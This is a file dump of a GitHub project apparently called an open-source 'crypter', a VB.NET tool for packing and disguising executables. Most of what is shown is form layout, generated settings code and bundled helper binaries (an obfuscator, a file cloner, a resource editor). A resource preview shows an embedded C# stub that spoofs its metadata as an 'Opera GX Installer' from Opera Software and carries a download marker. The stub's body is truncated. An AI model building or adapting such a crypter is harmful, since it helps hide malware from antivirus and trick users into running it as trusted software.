System.ComponentModel.ISupportInitialize).BeginInit() 39 | Me.SuspendLayout() 40 | ' 41 | 'Panel1 42 | ' 43 | Me.Panel1.BackColor = System.Drawing.Color.FromArgb(CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer)) 44 | Me.Panel1.Controls.Add(Me.RichTextBox3) 45 | Me.Panel1.Controls.Add(Me.Guna2GradientButton1) 46 | Me.Panel1.Location = New System.Drawing.Point(-7, 48) 47 | Me.Panel1.Name = "Panel1" 48 | Me.Panel1.Size = New System.Drawing.Size(523, 283) 49 | Me.Panel1.TabIndex = 0 50 | ' 51 | 'RichTextBox3 52 | ' 53 | Me.RichTextBox3.BackColor = System.Drawing.Color.FromArgb(CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer)) 54 | Me.RichTextBox3.BorderStyle = System.Windows.Forms.BorderStyle.None 55 | Me.RichTextBox3.ForeColor = System.Drawing.Color.IndianRed 56 | Me.RichTextBox3.Location = New System.Drawing.Point(68, 118) 57 | Me.RichTextBox3.Name = "RichTextBox3" 58 | Me.RichTextBox3.Size = New System.Drawing.Size(391, 45) 59 | Me.RichTextBox3.TabIndex = 5 60 | Me.RichTextBox3.Text = "YOUR KEY" 61 | ' 62 | 'Guna2GradientButton1 63 | ' 64 | Me.Guna2GradientButton1.Animated = True 65 | Me.Guna2GradientButton1.BackColor = System.Drawing.Color.Transparent 66 | Me.Guna2GradientButton1.BorderStyle = System.Drawing.Drawing2D.DashStyle.Dot 67 | Me.Guna2GradientButton1.CheckedState.Parent = Me.Guna2GradientButton1 68 | Me.Guna2GradientButton1.CustomImages.Parent = Me.Guna2GradientButton1 69 | Me.Guna2GradientButton1.FillColor = System.Drawing.Color.IndianRed 70 | Me.Guna2GradientButton1.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer)) 71 | Me.Guna2GradientButton1.Font = New System.Drawing.Font("Segoe UI", 9.0!) 72 | Me.Guna2GradientButton1.ForeColor = System.Drawing.Color.White 73 | Me.Guna2GradientButton1.HoverState.Parent = Me.Guna2GradientButton1 74 | Me.Guna2GradientButton1.IndicateFocus = True 75 | Me.Guna2GradientButton1.Location = New System.Drawing.Point(68, 203) 76 | Me.Guna2GradientButton1.Name = "Guna2GradientButton1" 77 | Me.Guna2GradientButton1.ShadowDecoration.Parent = Me.Guna2GradientButton1 78 | Me.Guna2GradientButton1.Size = New System.Drawing.Size(391, 47) 79 | Me.Guna2GradientButton1.TabIndex = 1 80 | Me.Guna2GradientButton1.Text = "Login" 81 | Me.Guna2GradientButton1.UseTransparentBackground = True 82 | ' 83 | 'Panel2 84 | ' 85 | Me.Panel2.BackColor = System.Drawing.Color.FromArgb(CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer)) 86 | Me.Panel2.Controls.Add(Me.PictureBox1) 87 | Me.Panel2.Controls.Add(Me.Guna2GradientButton2) 88 | Me.Panel2.Controls.Add(Me.Label1) 89 | Me.Panel2.Location = New System.Drawing.Point(-1, 0) 90 | Me.Panel2.Name = "Panel2" 91 | Me.Panel2.Size = New System.Drawing.Size(517, 70) 92 | Me.Panel2.TabIndex = 1 93 | ' 94 | 'PictureBox1 95 | ' 96 | Me.PictureBox1.Location = New System.Drawing.Point(17, 9) 97 | Me.PictureBox1.Name = "PictureBox1" 98 | Me.PictureBox1.Size = New System.Drawing.Size(48, 51) 99 | Me.PictureBox1.TabIndex = 10 100 | Me.PictureBox1.TabStop = False 101 | ' 102 | 'Guna2GradientButton2 103 | ' 104 | Me.Guna2GradientButton2.Animated = True 105 | Me.Guna2GradientButton2.BackColor = System.Drawing.Color.Transparent 106 | Me.Guna2GradientButton2.BorderStyle = System.Drawing.Drawing2D.DashStyle.Dot 107 | Me.Guna2GradientButton2.CheckedState.Parent = Me.Guna2GradientButton2 108 | Me.Guna2GradientButton2.CustomImages.Parent = Me.Guna2GradientButton2 109 | Me.Guna2GradientButton2.FillColor = System.Drawing.Color.IndianRed 110 | Me.Guna2GradientButton2.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer)) 111 | Me.Guna2GradientButton2.Font = New System.Drawing.Font("Segoe UI", 9.0!) 112 | Me.Guna2GradientButton2.ForeColor = System.Drawing.Color.White 113 | Me.Guna2GradientButton2.HoverState.Parent = Me.Guna2GradientButton2 114 | Me.Guna2GradientButton2.IndicateFocus = True 115 | Me.Guna2GradientButton2.Location = New System.Drawing.Point(462, 24) 116 | Me.Guna2GradientButton2.Name = "Guna2GradientButton2" 117 | Me.Guna2GradientButton2.ShadowDecoration.Parent = Me.Guna2GradientButton2 118 | Me.Guna2GradientButton2.Size = New System.Drawing.Size(43, 25) 119 | Me.Guna2GradientButton2.TabIndex = 2 120 | Me.Guna2GradientButton2.Text = "X" 121 | Me.Guna2GradientButton2.UseTransparentBackground = True 122 | ' 123 | 'Label1 124 | ' 125 | Me.Label1.AutoSize = True 126 | Me.Label1.Font = New System.Drawing.Font("Microsoft Sans Serif", 18.0!, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, CType(0, Byte)) 127 | Me.Label1.ForeColor = System.Drawing.Color.White 128 | Me.Label1.Location = New System.Drawing.Point(71, 21) 129 | Me.Label1.Name = "Label1" 130 | Me.Label1.Size = New System.Drawing.Size(282, 29) 131 | Me.Label1.TabIndex = 0 132 | Me.Label1.Text = "French Protector License" 133 | ' 134 | 'Guna2DragControl1 135 | ' 136 | Me.Guna2DragControl1.TargetControl = Me.Panel1 137 | ' 138 | 'Guna2DragControl2 139 | ' 140 | Me.Guna2DragControl2.TargetControl = Me.Panel2 141 | ' 142 | 'Guna2DragControl3 143 | ' 144 | Me.Guna2DragControl3.TargetControl = Me 145 | ' 146 | 'License 147 | ' 148 | Me.AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!) 149 | Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font 150 | Me.ClientSize = New System.Drawing.Size(513, 324) 151 | Me.Controls.Add(Me.Panel2) 152 | Me.Controls.Add(Me.Panel1) 153 | Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None 154 | Me.Name = "License" 155 | Me.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen 156 | Me.Text = "License" 157 | Me.Panel1.ResumeLayout(False) 158 | Me.Panel2.ResumeLayout(False) 159 | Me.Panel2.PerformLayout() 160 | CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).EndInit() 161 | Me.ResumeLayout(False) 162 | 163 | End Sub 164 | Friend WithEvents Panel1 As System.Windows.Forms.Panel 165 | Friend WithEvents Panel2 As System.Windows.Forms.Panel 166 | Friend WithEvents PictureBox1 As System.Windows.Forms.PictureBox 167 | Friend WithEvents Guna2GradientButton2 As Guna.UI2.WinForms.Guna2GradientButton 168 | Friend WithEvents Label1 As System.Windows.Forms.Label 169 | Friend WithEvents Guna2GradientButton1 As Guna.UI2.WinForms.Guna2GradientButton 170 | Friend WithEvents RichTextBox3 As System.Windows.Forms.RichTextBox 171 | Friend WithEvents Guna2DragControl1 As Guna.UI2.WinForms.Guna2DragControl 172 | Friend WithEvents Guna2DragControl2 As Guna.UI2.WinForms.Guna2DragControl 173 | Friend WithEvents Guna2DragControl3 As Guna.UI2.WinForms.Guna2DragControl 174 | End Class 175 | -------------------------------------------------------------------------------- /French Protector Build 230/License.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | 124 | 178, 17 125 | 126 | 127 | 339, 17 128 | 129 | -------------------------------------------------------------------------------- /French Protector Build 230/License.vb: -------------------------------------------------------------------------------- 1 | Public Class License 2 | 3 | Private Sub Guna2GradientButton1_Click(sender As Object, e As EventArgs) Handles Guna2GradientButton1.Click 4 | 5 | 6 | End Sub 7 | 8 | Private Sub Guna2GradientButton2_Click(sender As Object, e As EventArgs) Handles Guna2GradientButton2.Click 9 | Application.Exit() 10 | End Sub 11 | End Class -------------------------------------------------------------------------------- /French Protector Build 230/My Project/Application.Designer.vb: -------------------------------------------------------------------------------- 1 | '------------------------------------------------------------------------------ 2 | ' 3 | ' This code was generated by a tool. 4 | ' Runtime Version:4.0.30319.42000 5 | ' 6 | ' Changes to this file may cause incorrect behavior and will be lost if 7 | ' the code is regenerated. 8 | ' 9 | '------------------------------------------------------------------------------ 10 | 11 | Option Strict On 12 | Option Explicit On 13 | 14 | 15 | Namespace My 16 | 17 | 'NOTE: This file is auto-generated; do not modify it directly. To make changes, 18 | ' or if you encounter build errors in this file, go to the Project Designer 19 | ' (go to Project Properties or double-click the My Project node in 20 | ' Solution Explorer), and make changes on the Application tab. 21 | ' 22 | Partial Friend Class MyApplication 23 | 24 | _ 25 | Public Sub New() 26 | MyBase.New(Global.Microsoft.VisualBasic.ApplicationServices.AuthenticationMode.Windows) 27 | Me.IsSingleInstance = false 28 | Me.EnableVisualStyles = true 29 | Me.SaveMySettingsOnExit = true 30 | Me.ShutDownStyle = Global.Microsoft.VisualBasic.ApplicationServices.ShutdownMode.AfterMainFormCloses 31 | End Sub 32 | 33 | _ 34 | Protected Overrides Sub OnCreateMainForm() 35 | Me.MainForm = Global.French_Protector_Build_230.Form1 36 | End Sub 37 | End Class 38 | End Namespace 39 | -------------------------------------------------------------------------------- /French Protector Build 230/My Project/Application.myapp: -------------------------------------------------------------------------------- 1 |  2 | 3 | true 4 | Form1 5 | false 6 | 0 7 | true 8 | 0 9 | true 10 | false 11 | -------------------------------------------------------------------------------- /French Protector Build 230/My Project/AssemblyInfo.vb: -------------------------------------------------------------------------------- 1 | Imports System 2 | Imports System.Reflection 3 | Imports System.Runtime.InteropServices 4 | 5 | ' General Information about an assembly is controlled through the following 6 | ' set of attributes. Change these attribute values to modify the information 7 | ' associated with an assembly. 8 | 9 | ' Review the values of the assembly attributes 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 'The following GUID is for the ID of the typelib if this project is exposed to COM 21 | 22 | 23 | ' Version information for an assembly consists of the following four values: 24 | ' 25 | ' Major Version 26 | ' Minor Version 27 | ' Build Number 28 | ' Revision 29 | ' 30 | ' You can specify all the values or you can default the Build and Revision Numbers 31 | ' by using the '*' as shown below: 32 | ' 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /French Protector Build 230/My Project/Resources.Designer.vb: -------------------------------------------------------------------------------- 1 | '------------------------------------------------------------------------------ 2 | ' 3 | ' This code was generated by a tool. 4 | ' Runtime Version:4.0.30319.42000 5 | ' 6 | ' Changes to this file may cause incorrect behavior and will be lost if 7 | ' the code is regenerated. 8 | ' 9 | '------------------------------------------------------------------------------ 10 | 11 | Option Strict On 12 | Option Explicit On 13 | 14 | Imports System 15 | 16 | Namespace My.Resources 17 | 18 | 'This class was auto-generated by the StronglyTypedResourceBuilder 19 | 'class via a tool like ResGen or Visual Studio. 20 | 'To add or remove a member, edit your .ResX file then rerun ResGen 21 | 'with the /str option, or rebuild your VS project. 22 | ''' 23 | ''' A strongly-typed resource class, for looking up localized strings, etc. 24 | ''' 25 | _ 29 | Friend Module Resources 30 | 31 | Private resourceMan As Global.System.Resources.ResourceManager 32 | 33 | Private resourceCulture As Global.System.Globalization.CultureInfo 34 | 35 | ''' 36 | ''' Returns the cached ResourceManager instance used by this class. 37 | ''' 38 | _ 39 | Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager 40 | Get 41 | If Object.ReferenceEquals(resourceMan, Nothing) Then 42 | Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("French_Protector_Build_230.Resources", GetType(Resources).Assembly) 43 | resourceMan = temp 44 | End If 45 | Return resourceMan 46 | End Get 47 | End Property 48 | 49 | ''' 50 | ''' Overrides the current thread's CurrentUICulture property for all 51 | ''' resource lookups using this strongly typed resource class. 52 | ''' 53 | _ 54 | Friend Property Culture() As Global.System.Globalization.CultureInfo 55 | Get 56 | Return resourceCulture 57 | End Get 58 | Set 59 | resourceCulture = value 60 | End Set 61 | End Property 62 | 63 | ''' 64 | ''' Looks up a localized string similar to 65 | '''using System; 66 | '''using System.Collections.Generic; 67 | '''//download using System.Diagnostics; 68 | '''using System.Net; 69 | '''using System.Reflection; 70 | '''using System.Runtime.InteropServices; 71 | '''using System.Security.Cryptography; 72 | '''using System.Text; 73 | '''using System.Threading; 74 | '''using System.Windows.Forms; 75 | ''' 76 | '''//iamassembly [assembly: AssemblyTitle("Opera GX")] 77 | '''//iamassembly [assembly: AssemblyDescription("Opera GX Installer")] 78 | '''//iamassembly [assembly: AssemblyCompany("Opera Software")] 79 | '''//iamassembly [assembly: AssemblyProduct(" [rest of string was truncated]";. 80 | ''' 81 | Friend ReadOnly Property Stub() As String 82 | Get 83 | Return ResourceManager.GetString("Stub", resourceCulture) 84 | End Get 85 | End Property 86 | End Module 87 | End Namespace 88 | -------------------------------------------------------------------------------- /French Protector Build 230/My Project/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 122 | ..\Resources\Stub.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 123 | 124 | -------------------------------------------------------------------------------- /French Protector Build 230/My Project/Settings.Designer.vb: -------------------------------------------------------------------------------- 1 | '------------------------------------------------------------------------------ 2 | ' 3 | ' Bu kod araç tarafından oluşturuldu. 4 | ' Çalışma Zamanı Sürümü:4.0.30319.42000 5 | ' 6 | ' Bu dosyada yapılacak değişiklikler yanlış davranışa neden olabilir ve 7 | ' kod yeniden oluşturulursa kaybolur. 8 | ' 9 | '------------------------------------------------------------------------------ 10 | 11 | Option Strict On 12 | Option Explicit On 13 | 14 | 15 | Namespace My 16 | 17 | _ 20 | Partial Friend NotInheritable Class MySettings 21 | Inherits Global.System.Configuration.ApplicationSettingsBase 22 | 23 | Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings) 24 | 25 | #Region "My.Settings Otomatik Kaydetme İşlevi" 26 | #If _MyType = "WindowsForms" Then 27 | Private Shared addedHandler As Boolean 28 | 29 | Private Shared addedHandlerLockObject As New Object 30 | 31 | _ 32 | Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs) 33 | If My.Application.SaveMySettingsOnExit Then 34 | My.Settings.Save() 35 | End If 36 | End Sub 37 | #End If 38 | #End Region 39 | 40 | Public Shared ReadOnly Property [Default]() As MySettings 41 | Get 42 | 43 | #If _MyType = "WindowsForms" Then 44 | If Not addedHandler Then 45 | SyncLock addedHandlerLockObject 46 | If Not addedHandler Then 47 | AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings 48 | addedHandler = True 49 | End If 50 | End SyncLock 51 | End If 52 | #End If 53 | Return defaultInstance 54 | End Get 55 | End Property 56 | End Class 57 | End Namespace 58 | 59 | Namespace My 60 | 61 | _ 64 | Friend Module MySettingsProperty 65 | 66 | _ 67 | Friend ReadOnly Property Settings() As Global.French_Protector_Build_230.My.MySettings 68 | Get 69 | Return Global.French_Protector_Build_230.My.MySettings.Default 70 | End Get 71 | End Property 72 | End Module 73 | End Namespace 74 | -------------------------------------------------------------------------------- /French Protector Build 230/My Project/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /French Protector Build 230/app.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/French Protector Build 230.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/French Protector Build 230.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/French Protector Build 230.pdb -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/French Protector Build 230.vshost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/French Protector Build 230.vshost.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/French Protector Build 230.vshost.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/French Protector Build 230.vshost.exe.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/French Protector Build 230.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | FrenchProtectorBuild230 6 | 7 | 8 | 9 | 10 | 11 | Returns the cached ResourceManager instance used by this class. 12 | 13 | 14 | 15 | Overrides the current thread's CurrentUICulture property for all 16 | resource lookups using this strongly typed resource class. 17 | 18 | 19 | 20 | A strongly-typed resource class, for looking up localized strings, etc. 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/Guna.UI2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/Guna.UI2.dll -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/Obfuscator/Obfuscator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/Obfuscator/Obfuscator.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/Obfuscator/dnlib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/Obfuscator/dnlib.dll -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/FileCloner.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/FileCloner.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/FileCloner.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/FileCloner.pdb -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/FileCloner.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | FileCloner 6 | 7 | 8 | 9 | 10 | 11 | A strongly-typed resource class, for looking up localized strings, etc. 12 | 13 | 14 | 15 | 16 | Returns the cached ResourceManager instance used by this class. 17 | 18 | 19 | 20 | 21 | Overrides the current thread's CurrentUICulture property for all 22 | resource lookups using this strongly typed resource class. 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/Guna.UI2.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/Guna.UI2.dll -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm00.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm00.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm01.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm02.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm03.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm04.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm05.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm06.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm09.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm09.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm10.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm11.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm12.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/bm14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/bm14.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/desktop.ini: -------------------------------------------------------------------------------- 1 | [ViewState] 2 | Mode= 3 | Vid= 4 | FolderType=Generic 5 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/help.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/help.html -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/Help/resource_hacker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/Help/resource_hacker.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/ReadMe.txt -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/changes.txt: -------------------------------------------------------------------------------- 1 | Changes in 4.5.28 2 | Update: Major changes (and improvements) to the commandline syntax 3 | Changes in 4.5.28 4 | Update: Numerous changes and improvements to command line support. 5 | Update: Filenames in resource scripts are no longer required to be 6 | enclosed within double quotes unless they contain spaces. 7 | Changes in 4.4.24 8 | Bugfix: The toolbar state wasn't being preserved between sessions 9 | Changes in 4.3.20 10 | Bugfixes: Numerous fixes to commandline processing 11 | Bugfixes: Other minor fixes 12 | Changes in 4.2.5 13 | Bugfix: Compiling Delphi form resources was buggy. 14 | Bugfix: Adding a resource to a file without any resources was broken 15 | New: Can now change a text resource's format (unicode, UTF-8, ANSI) 16 | Changes in 4.2.4 17 | Bugfix: Error when compiling ansi encoded *.rc files 18 | Bugfix: RCDATA resources not displayed in their optimal format 19 | Bugfix: Error when trying to display 'compressed' resources 20 | Bugfix: 'Compressed' files can no longer be modified and saved 21 | Changes in 4.2.3 22 | Bugfix: Significant bug in the recompiler 23 | Bugfix: Minor bug displaying animated cursors 24 | Changes in 4.2.2 25 | Bugfix: Some monochrome images weren't being displayed 26 | Bugfix: Removed extraneous button in "Import Resources" dialog 27 | Bugfix: Manifest resources were being converted to UCS-2 format. 28 | Modified: Increased font sizes in all dialogs 29 | Changes in 4.2.1 (from 4.2.0) 30 | Bugfix: occasional Delphi form was not being decompiled 31 | Bugfix: hiding the toolbar disabled hide/show dialogs/menus. -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/info.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/info.res -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/res.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Debug/assembly/res/res.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Debug/assembly/res/res.ini: -------------------------------------------------------------------------------- 1 | [Setup] 2 | left=560 3 | top=300 4 | width=800 5 | height=440 6 | MaximizedState=0 7 | vsplit=200 8 | LastDir= 9 | BkColor=16185078 10 | DefaultLang=0 11 | ToolbarSize=1 12 | 13 | [MonospaceFont] 14 | Name=Courier New 15 | Size=9 16 | Color=-16777208 17 | Style=0 18 | 19 | [Font] 20 | Name=Tahoma 21 | Size=9 22 | Color=-16777208 23 | CharSet=1 24 | Style=0 25 | 26 | [MRU List] 27 | 1=C:\Users\aarbe\Desktop\ze.exe 28 | 